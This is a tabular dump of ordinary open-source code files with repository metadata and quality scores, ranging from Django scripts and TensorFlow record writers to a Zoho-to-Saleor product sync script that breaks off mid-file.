max_stars_repo_path (string, length 3-269) | max_stars_repo_name (string, length 4-119) | max_stars_count (int64, 0-191k) | id (string, length 1-7) | content (string, length 6-1.05M) | score (float64, 0.23-5.13) | int_score (int64, 0-5)
---|---|---|---|---|---|---
djspace/bin/gm2m.py | carthagecollege/django-djspace | 0 | 12796751 | <reponame>carthagecollege/django-djspace
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import django
import os
import sys
# env: DJANGO_SETTINGS_MODULE must be set before django.setup() is called
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djspace.settings.shell')
django.setup()
from django.contrib.auth.models import User
user = User.objects.get(pk=1217743)
print(user)
apps = user.profile.applications.all()
print(apps)
'''
if apps:
for a in apps:
#print a
print a.__dict__
#print a._state.__dict__
#print a.id
# don't work
#print a.all()
#print a.get_related_models()
'''
| 2.25 | 2 |
modules/parser/nodes/line_node.py | DavidMacDonald11/sea-to-c-transpiler-python-based | 0 | 12796752 | from modules.visitor.symbol_table import SymbolTable
from .ast_node import ASTNode
from .if_node import IfNode
class LineNode(ASTNode):
def __init__(self, expression, depth, no_end = False):
self.expression = expression
self.depth = depth
self.no_end = no_end
super().__init__(expression.position)
def __repr__(self):
return f"[{self.expression}]"
def interpret(self, interpreter):
return self.get_expression(interpreter)
def transpile(self, transpiler):
transpiler.depth = self.depth
expression = self.get_expression(transpiler)
indent = "\t" * self.depth
return f"{indent}{expression}{'' if self.no_end else ';'}\n"
def get_expression(self, visitor):
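# If-nodes are visited inside a fresh child SymbolTable so names defined in the
# block do not leak into the enclosing scope; the parent table is restored after.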
if isinstance(self.expression, IfNode):
visitor.symbol_table = SymbolTable(visitor.symbol_table)
expression = self.expression.visit(visitor)
visitor.symbol_table = visitor.symbol_table.parent
return expression
return self.expression.visit(visitor)
| 2.75 | 3 |
estruturais/flyweight/main.py | caio-bernardo/design-patterns-python | 363 | 12796753 | class KarakTea:
def __init__(self, tea_type):
self.__tea_type = tea_type
@property
def tea_type(self):
return self.__tea_type
class TeaMaker:
def __init__(self):
self.__available_tea = dict()
def make(self, preference):
if preference not in self.__available_tea:
self.__available_tea[preference] = KarakTea(preference)
return self.__available_tea[preference]
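# TeaMaker is the flyweight factory: repeated orders with the same preference
# reuse the single cached KarakTea instance instead of allocating a new object.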
class TeaShop:
def __init__(self, tea_maker):
self.__orders = dict()
self.__tea_maker = tea_maker
def take_order(self, tea_type, table):
if table not in self.__orders:
self.__orders[table] = list()
self.__orders[table].append(self.__tea_maker.make(tea_type))
def serve(self):
for table, orders in self.__orders.items():
print('Serving tea to table {}'.format(table))
if __name__ == '__main__':
tea_maker = TeaMaker()
shop = TeaShop(tea_maker)
shop.take_order('red tea', 1)
shop.take_order('red tea more sugar', 2)
shop.take_order('red tea more milk', 3)
shop.serve()
| 3.453125 | 3 |
examples/covid19/import_csse_covid19_daily.py | cudeso/PyMISP | 0 | 12796754 | <filename>examples/covid19/import_csse_covid19_daily.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pathlib import Path
from csv import DictReader
from pymisp import MISPEvent, MISPOrganisation, PyMISP
from datetime import datetime
from dateutil.parser import parse
import json
from pymisp.tools import feed_meta_generator
from io import BytesIO
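# make_feed switches between writing MISP feed JSON files to ./output (True)
# and pushing each event to a live MISP instance via PyMISP (False).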
make_feed = False
path = Path('/home/raphael/gits/COVID-19/csse_covid_19_data/csse_covid_19_daily_reports/')
if make_feed:
org = MISPOrganisation()
org.name = 'CIRCL'
org.uuid = "55f6ea5e-2c60-40e5-964f-47a8950d210f"
else:
from covid_key import url, key
misp = PyMISP(url, key)
for p in path.glob('**/*.csv'):
d = datetime.strptime(p.name[:-4], '%m-%d-%Y').date()
event = MISPEvent()
event.info = f"[{d.isoformat()}] CSSE COVID-19 daily report"
event.date = d
event.distribution = 3
event.add_tag('tlp:white')
if make_feed:
event.orgc = org
else:
e = misp.search(eventinfo=event.info, metadata=True, pythonify=True)
if e:
# Already added.
continue
event.add_attribute('attachment', p.name, data=BytesIO(p.open('rb').read()))
event.add_attribute('link', f'https://github.com/CSSEGISandData/COVID-19/tree/master/csse_covid_19_data/csse_covid_19_daily_reports/{p.name}', comment='Source')
with p.open() as f:
reader = DictReader(f)
for row in reader:
obj = event.add_object(name='covid19-csse-daily-report', standalone=False)
if 'Province/State' in row:
if row['Province/State']:
obj.add_attribute('province-state', row['Province/State'])
elif '\ufeffProvince/State' in row:
if row['\ufeffProvince/State']:
obj.add_attribute('province-state', row['\ufeffProvince/State'])
else:
print(p, row.keys())
raise Exception()
obj.add_attribute('country-region', row['Country/Region'])
obj.add_attribute('update', parse(row['Last Update']))
if row['Confirmed']:
obj.add_attribute('confirmed', int(row['Confirmed']))
if row['Deaths']:
obj.add_attribute('death', int(row['Deaths']))
if row['Recovered']:
obj.add_attribute('recovered', int(row['Recovered']))
if make_feed:
with (Path('output') / f'{event.uuid}.json').open('w') as _w:
json.dump(event.to_feed(), _w)
else:
misp.add_event(event)
if make_feed:
feed_meta_generator(Path('output'))
| 2.203125 | 2 |
data_scripts/create_splits.py | Berndwl/TextMaps | 86 | 12796755 | <reponame>Berndwl/TextMaps
import os
import sys
from sklearn.cross_validation import KFold
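# NOTE: sklearn.cross_validation was removed in scikit-learn 0.20; on current
# versions KFold lives in sklearn.model_selection (and n_folds became n_splits).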
RESULT_PATH = '../data_shops/page_sets/splits/'
PAGE_SETS_PATH = '../data_shops/page_sets/'
SHOP_LIST_PATH = '../data_shops/shop_list.txt'
def getPagesForShops(shops):
pages = []
for shop in shops:
page_set_path = os.path.join(PAGE_SETS_PATH,shop)
with open(page_set_path, 'r') as f:
shop_pages = [l.strip() for l in f.readlines()]
pages.extend(shop_pages)
return pages
def createListFile(filename, pages):
# for each page
lines = []
for page in pages:
line=page
lines.append(line)
with open(os.path.join(RESULT_PATH, filename),'w') as f:
for line in lines:
f.write(line+'\n')
#----- MAIN PART
if __name__ == "__main__":
# read shop list
with open(SHOP_LIST_PATH, 'r') as f:
shops = [l.strip() for l in f.readlines()]
kf = KFold(len(shops), n_folds=10)
split_num=1
for train_index, test_index in kf:
train_shops = [shops[i] for i in train_index]
test_shops = [shops[i] for i in test_index]
# get pages
train_pages = getPagesForShops(train_shops)
test_pages = getPagesForShops(test_shops)
createListFile('split_'+str(split_num)+'_train.txt',train_pages)
createListFile('split_'+str(split_num)+'_test.txt',test_pages)
split_num+=1
| 2.6875 | 3 |
xls/build_rules/xls_rules_build_defs.bzl | netskink/xls | 0 | 12796756 | <reponame>netskink/xls
# Copyright 2021 The XLS Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module contains build rules/macros for XLS.
This module contain all the XLS build rules/macros that require testing but are
not exposed to the user. This module is created for convenience.
"""
load(
"//xls/build_rules:xls_codegen_rules.bzl",
_xls_ir_verilog = "xls_ir_verilog",
)
load(
"//xls/build_rules:xls_jit_wrapper_rules.bzl",
_xls_ir_jit_wrapper = "xls_ir_jit_wrapper",
_xls_ir_jit_wrapper_macro = "xls_ir_jit_wrapper_macro",
)
load(
"//xls/build_rules:xls_ir_rules.bzl",
_xls_dslx_ir = "xls_dslx_ir",
_xls_ir_opt_ir = "xls_ir_opt_ir",
)
load(
"//xls/build_rules:xls_rules.bzl",
_xls_dslx_opt_ir = "xls_dslx_opt_ir",
_xls_dslx_verilog = "xls_dslx_verilog",
)
xls_dslx_ir = _xls_dslx_ir
xls_dslx_opt_ir = _xls_dslx_opt_ir
xls_dslx_verilog = _xls_dslx_verilog
xls_ir_opt_ir = _xls_ir_opt_ir
xls_ir_verilog = _xls_ir_verilog
xls_ir_jit_wrapper = _xls_ir_jit_wrapper
xls_ir_jit_wrapper_macro = _xls_ir_jit_wrapper_macro
| 1.382813 | 1 |
py/tests/test_nil.py | JakeMakesStuff/erlpack | 108 | 12796757 | from __future__ import absolute_import
from erlpack import pack
def test_nil():
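# b'\x83s\x03nil' is Erlang's external term format: 0x83 version byte,
# 's' (SMALL_ATOM_EXT tag), a 1-byte length of 3, then the atom name "nil".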
assert pack(None) == b'\x83s\x03nil'
| 1.445313 | 1 |
operative/test/report_test.py | buzzfeed/python-operative | 0 | 12796758 | import unittest
import operative
import datetime
from caliendo.patch import patch
from caliendo import expected_value
from nose.tools import eq_, ok_
from operative.settings import TEST_FTP_LOGIN
class ReportTest(unittest.TestCase):
"""
Test the various reports.
"""
@patch('operative.FTPConnection.get_files')
@patch('operative.FTPConnection._establish_connection')
@patch('operative.FTPConnection._close_connection')
def test_line_item_report(self):
"""
Test LineItemReport
"""
from operative.reports.line_item_report import LineItemReport
def __get_and_test(path, since):
ftp_creds = operative.FTPCredentials(**TEST_FTP_LOGIN)
line_item_reports = LineItemReport().get_report_files(ftp_credentials=ftp_creds, ftp_path=path, since=since)
for lir in line_item_reports:
observed_value = str(lir.data[0])
eq_(expected_value.get_or_store(observed_value), observed_value)
# get all files
__get_and_test(path='/flatfile', since=None)
# get one file - using "since"
__get_and_test(path='/flatfile', since=datetime.datetime(2014, 1, 7, 0, 42))
# get zero files - using "since"
__get_and_test(path='/flatfile', since=datetime.datetime(2014, 2, 1))
# get zero files - only directories in path
__get_and_test(path='/', since=None)
| 2.125 | 2 |
pys/006_get_table_columns.py | indecipherable/linuxtest_dust | 0 | 12796759 | <reponame>indecipherable/linuxtest_dust
# works as intended
import mysql.connector
from mysql.connector import errorcode
import sys
import re
import os
from pprint import pprint as p
# trying to import where_am_i as module
#import importlib
#where_am_i="/000_where_am_i"
#sys.path.append(os.getcwd())
#import 000_where_am_i
#pm = __import__(where_am_i)
#find_where_am_i()
import mysql.connector
from mysql.connector import errorcode
line_count = 0
# defines strip_end for project_dir
def strip_end(text, suffix):
if not text.endswith(suffix):
return text
return text[:len(text)-len(suffix)]
# enumerate where our project directories are
#print("DEBUG: sys.path is: %r" % sys.path)
py_wd=os.getcwd()
#print("DEBUG: thiscwd is: %r" % py_wd)
project_dir=strip_end(py_wd, "/pys")
#print("DEBUG: stripcwd is: %r" % project_dir)
q_dir=project_dir+"/questions"
#print("DEBUG: q_dir is: %r" % q_dir)
def get_table_columns():
try:
cnx = mysql.connector.connect(user='root', password='<PASSWORD>',
host='127.0.0.1', database='linuxquiztest')
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exist")
else:
print(err)
else:
cursor = cnx.cursor()
cursor.execute("DESCRIBE questions;")
my_columns = cursor.fetchall()
cursor.close()
for (a_column) in my_columns:
# line_count = line_count + 1
print(a_column)
# print("DEBUG: line_count is: %s" % line_count)
return my_columns
get_table_columns()
#print(my_columns)
| 2.390625 | 2 |
datasets/create_tf_record.py | ace19-dev/image-retrieval-tf | 6 | 12796760 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hashlib
import io
import os
import random
from PIL import Image, ImageStat
import tensorflow as tf
from datasets import dataset_utils
flags = tf.app.flags
flags.DEFINE_string('dataset_dir',
'/home/ace19/dl_data/materials',
'Root Directory to dataset.')
flags.DEFINE_string('output_path',
'/home/ace19/dl_data/materials/query.record',
'Path to output TFRecord')
flags.DEFINE_string('dataset_category',
'query',
'dataset category, train|validation|test')
FLAGS = flags.FLAGS
def get_label_map(label_to_index):
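# Builds a {image_path: class_index} map by walking
# <dataset_dir>/<dataset_category>/<class>/<image> on disk.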
label_map = {}
# cls_lst = os.listdir(FLAGS.dataset_dir)
cls_path = os.path.join(FLAGS.dataset_dir, FLAGS.dataset_category)
cls_lst = os.listdir(cls_path)
for i, cls in enumerate(cls_lst):
data_path = os.path.join(cls_path, cls)
img_lst = os.listdir(data_path)
for n, img in enumerate(img_lst):
img_path = os.path.join(data_path, img)
label_map[img_path] = label_to_index[cls]
return label_map
def dict_to_tf_example(image_name,
dataset_directory,
label_map=None,
image_subdirectory='train'):
"""
Args:
image: a single image name
dataset_directory: Path to root directory holding PCam dataset
label_map: A map from string label names to integers ids.
image_subdirectory: String specifying subdirectory within the
PCam dataset directory holding the actual image data.
Returns:
example: The converted tf.Example.
Raises:
ValueError: if the image pointed to by image is not a valid PNG
"""
# full_path = os.path.join(dataset_directory, image_subdirectory, image_name)
full_path = os.path.join(dataset_directory, image_name)
with tf.io.gfile.GFile(full_path, 'rb') as fid:
encoded = fid.read()
encoded_io = io.BytesIO(encoded)
image = Image.open(encoded_io)
width, height = image.size
format = image.format
image_stat = ImageStat.Stat(image)
mean = image_stat.mean
std = image_stat.stddev
key = hashlib.sha256(encoded).hexdigest()
# if image_subdirectory.lower() == 'test':
# label = -1
# else:
# label = int(label_map[image_name])
label = int(label_map[full_path])
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': dataset_utils.int64_feature(height),
'image/width': dataset_utils.int64_feature(width),
'image/filename': dataset_utils.bytes_feature(image_name.encode('utf8')),
'image/fullpath': dataset_utils.bytes_feature(full_path.encode('utf8')),
'image/source_id': dataset_utils.bytes_feature(image_name.encode('utf8')),
'image/key/sha256': dataset_utils.bytes_feature(key.encode('utf8')),
'image/encoded': dataset_utils.bytes_feature(encoded),
'image/format': dataset_utils.bytes_feature(format.encode('utf8')),
'image/class/label': dataset_utils.int64_feature(label),
# 'image/text': dataset_util.bytes_feature('label_text'.encode('utf8'))
'image/mean': dataset_utils.float_list_feature(mean),
'image/std': dataset_utils.float_list_feature(std)
}))
return example
def main(_):
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.INFO)
options = tf.io.TFRecordOptions(tf.io.TFRecordCompressionType.GZIP)
writer = tf.io.TFRecordWriter(FLAGS.output_path, options=options)
# cls_lst = os.listdir(FLAGS.dataset_dir)
dataset_lst = os.path.join(FLAGS.dataset_dir, FLAGS.dataset_category)
cls_lst = os.listdir(dataset_lst)
cls_lst.sort()
label_to_index = {}
for i, cls in enumerate(cls_lst):
cls_path = os.path.join(dataset_lst, cls)
if os.path.isdir(cls_path):
label_to_index[cls] = i
label_map = get_label_map(label_to_index)
random.shuffle(cls_lst)
for i, cls in enumerate(cls_lst):
cls_path = os.path.join(dataset_lst, cls)
img_lst = os.listdir(cls_path)
total = len(img_lst)
for idx, image in enumerate(img_lst):
if idx % 100 == 0:
tf.compat.v1.logging.info('On image %d of %d', idx, total)
tf_example = dict_to_tf_example(image, cls_path, label_map, FLAGS.dataset_category)
writer.write(tf_example.SerializeToString())
writer.close()
if __name__ == '__main__':
tf.compat.v1.app.run()
| 2.25 | 2 |
examples/settings.py | seankmartin/brainrender | 0 | 12796761 | <filename>examples/settings.py
"""
Brainrender provides several default settins (e.g. for shader style)
which can be changed to personalize your rendering.
This example shows you how
"""
import brainrender
from brainrender import Scene
from rich import print
from myterial import orange
from pathlib import Path
print(f"[{orange}]Running example: {Path(__file__).name}")
brainrender.settings.BACKGROUND_COLOR = [
0.22,
0.22,
0.22,
] # change rendering background color
brainrender.settings.WHOLE_SCREEN = (
False # make the rendering window be smaller
)
brainrender.settings.SHOW_AXES = (
False # turn off the axes display
)
# make scenes with different shader styles
for shader in ("plastic", "cartoon"):
brainrender.settings.SHADER_STYLE = shader
scene = Scene(title=shader)
scene.render()
| 2.859375 | 3 |
parser/team02/proyec_v2/ast/Expresion.py | webdev188/tytus | 35 | 12796762 | class Expresion:
def getValor(self,entorno,tree):
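# Base class for AST expression nodes: concrete subclasses are expected to
# override getValor(entorno, tree) to return their evaluated value.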
pass
| 1.398438 | 1 |
arike/visits/migrations/0005_auto_20220304_2228.py | iamsdas/arike | 0 | 12796763 | <filename>arike/visits/migrations/0005_auto_20220304_2228.py
# Generated by Django 3.2.12 on 2022-03-04 16:58
import datetime
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('patients', '0014_auto_20220304_2228'),
('visits', '0004_auto_20220304_2225'),
]
operations = [
migrations.AlterField(
model_name='treatmentnote',
name='created_at',
field=models.DateTimeField(default=datetime.datetime(2022, 3, 4, 16, 58, 46, 500162, tzinfo=utc)),
),
migrations.AlterField(
model_name='treatmentnote',
name='treatment',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='patients.treatment'),
),
migrations.AlterField(
model_name='visitdetails',
name='created_at',
field=models.DateTimeField(default=datetime.datetime(2022, 3, 4, 16, 58, 46, 499184, tzinfo=utc)),
),
migrations.AlterField(
model_name='visitschedule',
name='created_at',
field=models.DateTimeField(default=datetime.datetime(2022, 3, 4, 16, 58, 46, 498165, tzinfo=utc)),
),
]
| 1.476563 | 1 |
app/routers/weather/models.py | neurothrone/weather-api | 0 | 12796764 | from pydantic import BaseModel, Field
from app.shared.enums import Units
class LocationBase(BaseModel):
units: Units = Units.METRIC
class CityLocation(BaseModel):
city: str
state: str | None = Field(default=None, max_length=3)
country: str | None = None
class Config:
schema_extra = {
"example": {
"city": "gothenburg"
}
}
class CoordsLocation(LocationBase):
lat: float
lon: float
class Config:
schema_extra = {
"example": {
"lat": "50",
"lon": "30"
}
}
class WeatherOut(BaseModel):
temperature: str
units: Units
city: str | None = None
country: str | None = None
weather: str | None = None
lat: float | None = None
lon: float | None = None
| 2.796875 | 3 |
scripts/planet-caravan/zoho-sync.py | labogdan/planet-caravan-backend | 0 | 12796765 | import os
import sys
import json
import mimetypes
import urllib
import requests
import django
sys.path.append(os.path.abspath('.'))
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "saleor.settings")
try:
django.setup()
except:
pass
from django.core.cache import cache
from dotenv import load_dotenv
from Lib.CLI import *
from Lib.helpers import handleize, description_block
from Lib.Saleor.Product import Product
from Lib.Saleor.Variant import Variant
from Lib.Saleor.ProductType import ProductType
from Lib.Saleor.ProductAttribute import ProductAttribute
from Lib.Saleor.ProductAttributeValue import ProductAttributeValue
from Lib.Saleor.Category import Category
from Lib.Saleor.ProductCollection import ProductCollection
import psycopg2
from psycopg2.extras import DictCursor
from pprint import pprint
import boto3
import pickle
from datetime import datetime, timedelta
from Lib.Email import send_email
oauth_token = None
# Global variable
cursor = None
db = None
environment = 'local'
def db_connect(env='production'):
info("Connecting to DB")
global db
global environment
environment = env
try:
if environment == 'local':
# Local dev
db_name = os.getenv('DB_NAME')
db_user = os.getenv('DB_USER')
db_host = os.getenv('DB_HOST')
db_pass = os.getenv('DB_PASS')
db = psycopg2.connect(
f"dbname='{db_name}' user='{db_user}' host='{db_host}' password='{db_<PASSWORD>}'")
else:
# Heroku Production
db_host = os.environ['DATABASE_URL']
db = psycopg2.connect(db_host, sslmode='require')
db.autocommit = True
return db
except Exception as e:
error("Unable to connect to database.")
error(e)
return False
def get_oauth():
global oauth_token
oauth_url = 'https://accounts.zoho.com/oauth/v2/token'
params = {
'client_id': os.getenv('ZOHO_CLIENT_ID'),
'client_secret': os.getenv('ZOHO_CLIENT_SECRET'),
'refresh_token': os.getenv('ZOHO_REFRESH_TOKEN'),
'grant_type': 'refresh_token'
}
response = requests.post(url=oauth_url, params=params)
if response is not None:
oauth_token = response.json()['access_token']
return True
return False
def handle_raw_product(raw_product: dict = None, config: dict = None):
global cursor
if not config:
config = {
'force_images': False
}
print('======================================')
warning(f'handle_raw_product(): {raw_product["Product_Name"]}')
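# Maps a raw Zoho CRM record onto the local Saleor models: core product fields,
# metadata (drop date, cross-sell, pelican size), one variant keyed by SKU, a
# product type with up to six attribute name/value pairs, a Department/Category
# pair and optional comma-separated collections, then the product images.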
# Product
product = Product()
product.name = raw_product['Product_Name'].split('|')[0].strip()
product.slug = handleize(raw_product['Product_Name'])
product.description = str(raw_product['Description'])
product.description_json = description_block(raw_product['Description'])
metadata = {}
for mk, pk in {
'DROP_DATE': 'Drop_Date_Time',
'COMING_SOON': 'Coming_Soon',
'CROSS_SELL': 'Cross_Sell',
'CROSS_SELL_URL': 'Cross_Sell_URL',
'PELICAN_SIZE': 'Suggested_Pelican_Size'
}.items():
if pk in raw_product and raw_product[pk] is not None:
metadata[mk] = str(raw_product[pk])
product.metadata = json.dumps(metadata)
product.private_metadata = json.dumps({
'ZOHO_ID': raw_product['id']
})
# Variant
variant = Variant()
variant.name = str(raw_product['Product_Name'])
variant.sku = str(raw_product['SKU']).strip("'")
if not variant.sku:
error("No SKU, skipping.")
return False
variant.cost_price_amount = raw_product['Cost']
variant.weight = 0
variant.price_amount = raw_product['Unit_Price']
product.variants.append(variant)
# Product type
pt = ProductType()
pt.type = raw_product['Category']
pt.slug = handleize(raw_product['Category'])
# Category
if 'Department' not in raw_product.keys() or raw_product['Department'] is None:
error(f'Product {product.name} has no Department')
return
parent_category = Category(raw_product['Department'])
if 'Category' not in raw_product.keys() or raw_product['Category'] is None:
error(f'Product {product.name} has no Category')
return
child_category = Category(raw_product['Category'])
child_category.level = 1
parent_category.children.append(child_category)
product.category = parent_category
# Attributes
for i in range(1, 7):
name_key = f'Attribute_Name_{i}'
value_key = f'Attribute_Value_{i}'
if (name_key in raw_product.keys() and value_key in raw_product.keys()
and raw_product[name_key] and raw_product[value_key]):
product_attribute = ProductAttribute(raw_product[name_key],
[ProductAttributeValue(
raw_product[value_key])])
pt.add_attribute(product_attribute)
product.type = pt
# Collections
if 'Collection' in raw_product.keys() and type(raw_product['Collection']) is str:
for collection_name in raw_product['Collection'].split(','):
collection_name = collection_name.strip()
collection = ProductCollection()
collection.name = collection_name
collection.slug = handleize(collection_name)
product.collections.append(collection)
create_or_update_data(product)
# Images
handle_images(product, raw_product, config['force_images'])
def create_or_update_data(product: Product = None):
global cursor
info(f'create_or_update_data(): {product.name} | {product.variants[0].sku}')
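# Upsert flow: resolve the product type, category tree and collections first,
# then match the product by its variant's SKU and INSERT ... ON CONFLICT (or
# UPDATE) the product, attributes, variant, collection links and warehouse stock.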
product.type = handle_product_type(product.type)
comment(f'Product type ID: {product.type.id}')
product.category = handle_product_category(product.category)
comment(f'Product category ID: {product.category.children[0].id}')
product.collections = handle_product_collection(product.collections)
# Create the product, matched by SKU
cursor.execute("""
SELECT p.id
FROM product_productvariant pv
LEFT JOIN product_product p ON pv.product_id = p.id
WHERE pv.sku = %s
""", (product.variants[0].sku,))
product_result = cursor.fetchone()
if product_result:
product.id = product_result[0]
cursor.execute("""
UPDATE product_product
SET id = product_product.id, name = %s,
description = %s, description_json = %s, product_type_id = %s,
category_id = %s, metadata = %s, private_metadata = %s, updated_at = NOW(),
is_published = %s, publication_date = NOW()
WHERE id = %s
""",
(
# UPDATE clause
product.name, product.description, product.description_json,
product.type.id, product.category.children[0].id,
product.metadata, product.private_metadata,
product.is_published,
product.id
))
else:
cursor.execute("""
INSERT INTO product_product
(name, description, description_json, product_type_id, category_id,
is_published, charge_taxes, currency, slug, visible_in_listings, metadata,
private_metadata, in_stock, publication_date, updated_at, available_for_purchase)
VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, NOW(), NOW(), NOW())
ON CONFLICT (slug) DO UPDATE
SET id = product_product.id, name = %s,
description = %s, description_json = %s, product_type_id = %s,
category_id = %s, metadata = %s, private_metadata = %s,
is_published = %s, publication_date = NOW(),
updated_at = NOW()
RETURNING id
""",
(
# INSERT clause
product.name, product.description, product.description_json,
product.type.id, product.category.children[0].id,
product.is_published, product.charge_taxes,
product.currency, product.slug, product.visible_in_listings,
product.metadata, product.private_metadata, False,
# UPDATE clause
product.name, product.description, product.description_json,
product.type.id, product.category.children[0].id,
product.metadata, product.private_metadata,
product.is_published
))
product.id = cursor.fetchone()[0]
info(f'Product ID: {product.id}')
# Add Attributes
for i, attribute in enumerate(product.type.attributes):
cursor.execute("""
INSERT INTO product_assignedproductattribute(product_id, assignment_id)
VALUES(%s, %s)
ON CONFLICT (product_id, assignment_id) DO UPDATE
SET id = product_assignedproductattribute.id
RETURNING id
""",
(product.id, attribute.assignment_id))
apa_id = cursor.fetchone()[0]
# Clear out prior attribute
cursor.execute("""
DELETE FROM product_assignedproductattribute_values
WHERE assignedproductattribute_id = %s
""", (apa_id,))
# Create the new value
cursor.execute("""
INSERT INTO product_assignedproductattribute_values
(assignedproductattribute_id, attributevalue_id)
VALUES(%s, %s)
ON CONFLICT (assignedproductattribute_id, attributevalue_id)
DO NOTHING
""",
(apa_id, attribute.values[0].id))
# Add Variant
variant = product.variants[0]
cursor.execute("""
INSERT INTO product_productvariant
(sku, name, product_id, cost_price_amount, weight, metadata, private_metadata,
currency, price_amount, track_inventory)
VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, TRUE)
ON CONFLICT (sku) DO UPDATE
SET id = product_productvariant.id
RETURNING id
""", (variant.sku, variant.name, product.id,
variant.cost_price_amount, variant.weight,
variant.metadata, variant.private_metadata,
variant.currency, variant.price_amount))
variant.id = cursor.fetchone()[0]
info(f'Variant ID: {variant.id}')
try:
cursor.execute("""
UPDATE product_product
SET default_variant_id = %s
WHERE id = %s
""", (variant.id, product.id))
except:
pass
# Add To Collections
collections_to_keep = ()
if len(product.collections):
for collection in product.collections:
collections_to_keep = (*collections_to_keep, collection.id)
warning(f'Adding to collection: {product.id} in {collection.id}')
cursor.execute("""
INSERT INTO product_collectionproduct(collection_id, product_id)
VALUES(%s, %s)
ON CONFLICT (collection_id, product_id)
DO NOTHING
""", (collection.id, product.id))
if len(collections_to_keep):
# Remove from any other collections
cursor.execute("""
DELETE FROM product_collectionproduct
WHERE product_id = %s AND collection_id NOT IN %s
""", (product.id, collections_to_keep))
else:
# Just remove from all
cursor.execute("""
DELETE FROM product_collectionproduct
WHERE product_id = %s
""", (product.id,))
# Add Warehouse entry
cursor.execute("""
SELECT id
FROM warehouse_warehouse
LIMIT 1""")
warehouse_id = cursor.fetchone()[0]
info(f'Creating warehouse entry: {warehouse_id}')
cursor.execute("""
INSERT INTO warehouse_stock (product_variant_id, quantity, warehouse_id)
VALUES(%s, %s, %s)
ON CONFLICT(product_variant_id, warehouse_id) DO NOTHING
""", (product.variants[0].id, 0, warehouse_id))
return True
def handle_images(product: Product, raw_product: dict = None,
force_images: bool = False) -> None:
global oauth_token
global cursor
global environment
raw_images = []
for i in range(10):
k = f'Product_Photo{i}'
if k in raw_product.keys() and raw_product[k] and len(raw_product[k]) > 0:
raw_images.append(raw_product[k][0])
s3 = None
AWS_MEDIA_BUCKET_NAME = os.environ.get("AWS_MEDIA_BUCKET_NAME")
AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY")
zoho_id = json.loads(product.private_metadata)['ZOHO_ID']
url = f'https://www.zohoapis.com/crm/v2/Products/{zoho_id}/Attachments'
headers = {
'Authorization': f'Zoho-oauthtoken {oauth_token}',
}
all_filenames = ()
for i, image in enumerate(raw_images):
attachment_id = image['attachment_Id']
filename = image['file_Name']
all_filenames = (*all_filenames, f"products/{filename}")
try:
# Check if filename exists already
cursor.execute("""
SELECT COUNT(*) AS count
FROM product_productimage
WHERE product_id = %s and image = %s
""", (product.id, f"products/{filename}"))
existing_image = cursor.fetchone()[0]
# Upload if new or forced
if (not existing_image and environment != 'local') or force_images is True:
warning(f'Uploading Image: {filename}')
session = boto3.Session(
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY,
)
s3 = session.resource('s3')
mtype = mimetypes.MimeTypes().guess_type(filename)[0]
img_url = f'{url}/{attachment_id}'
info(img_url)
req = urllib.request.Request(img_url, headers=headers)
response = urllib.request.urlopen(req)
img_bytes = response.read()
s3.Bucket(AWS_MEDIA_BUCKET_NAME).put_object(
Body=img_bytes,
Key=f'products/{filename}',
ContentType=mtype)
# Insert or update db
if not existing_image:
cursor.execute("""
INSERT INTO product_productimage(sort_order, product_id, image, ppoi, alt)
VALUES(%s, %s, %s, %s, %s)
""", (i, product.id, f"products/{filename}", '0.5x0.5', ''))
else:
cursor.execute("""
UPDATE product_productimage
SET sort_order = %s
WHERE product_id = %s and image = %s
""", (i, product.id, f"products/{filename}"))
warning(f'Existing Image: {filename}')
except:
pass
# Clear out unused photos
try:
if len(all_filenames):
warning("Keep files:")
warning(all_filenames)
cursor.execute("""
DELETE FROM product_productimage
WHERE product_id = %s AND image NOT IN %s
""", (product.id, all_filenames))
else:
cursor.execute("""
DELETE FROM product_productimage
WHERE product_id = %s
""", (product.id,))
except:
error('Error clearing out unused images.')
pass
def handle_product_type(pt: ProductType = None) -> int:
global cursor
warning('PRODUCT TYPE')
# The ProductType itself
cursor.execute("""
INSERT INTO product_producttype (name, has_variants, is_shipping_required, weight,
is_digital, slug, metadata, private_metadata)
VALUES(%s, %s, %s, %s, %s, %s, %s, %s)
ON CONFLICT (slug) DO UPDATE
SET id = product_producttype.id, name = %s
RETURNING id
""", (
# INSERT clause
pt.type, False, True, 0, False, pt.slug, '{}', '{}',
# UPDATE clause
pt.type))
pt.id = cursor.fetchone()[0]
# Attributes
for i, attribute in enumerate(pt.attributes):
cursor.execute("""
INSERT INTO product_attribute (name, slug, input_type,
available_in_grid, visible_in_storefront, filterable_in_dashboard,
filterable_in_storefront, value_required, storefront_search_position,
is_variant_only, metadata, private_metadata)
VALUES(%s, %s, %s, TRUE, TRUE, TRUE, TRUE, TRUE, 0, FALSE, '{}', '{}')
ON CONFLICT (slug) DO UPDATE
SET id = product_attribute.id, name = %s
RETURNING id
""", (
# INSERT clause
attribute.type, attribute.slug, 'dropdown',
# UPDATE clause
attribute.type
))
pt.attributes[i].id = cursor.fetchone()[0]
comment(f'Attribute {attribute.type}({i}) : {pt.attributes[i].id}')
